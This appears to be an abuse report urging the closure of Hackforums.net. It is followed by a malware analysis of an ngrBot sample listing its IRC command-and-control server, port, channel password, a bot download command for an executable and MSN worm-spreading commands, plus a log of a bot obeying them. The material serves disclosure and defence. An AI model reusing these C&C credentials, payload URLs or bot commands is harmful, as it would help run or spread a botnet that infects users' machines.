Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it is a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services, etc.

I'm not certain what your criteria are for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activities and it should be closed as soon as possible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

77.79.7.246 (ngrBot hosted in Lithuania, Splius Uab)

DNS Lookup
Host Name IP Address
api.wipmania.com
api.wipmania.com 213.251.170.52
fullyundetectable.com
UDP Connections
Download URLs
http://213.251.170.52/ (api.wipmania.com)

Outgoing connection to remote server: api.wipmania.com TCP port 80
C&C Server: 77.79.7.246:1863
Server Password:
Username: iogjzhd
Nickname: n{DE|XPa}iogjzhd
Channel: #ngr (Password: ngrbot)
Channeltopic: :.s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg


Now talking in #ngr
Topic On: [ #ngr ] [ .s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg ]
Topic By: [ DCO ]
Joins: {USA|W7u}gpqhwpn [gpqhwpn@5BD873C8.B62ADEB3.A9D605B8.IP]
({USA|W7u}gpqhwpn) [MSN]: Updated MSN spread interval to "5"
({USA|W7u}gpqhwpn) [MSN]: Updated MSN spread message to "http://img33.lmageshack.org/images/?id=image11.jpg"

Hosting info:
http://whois.domaintools.com/77.79.7.246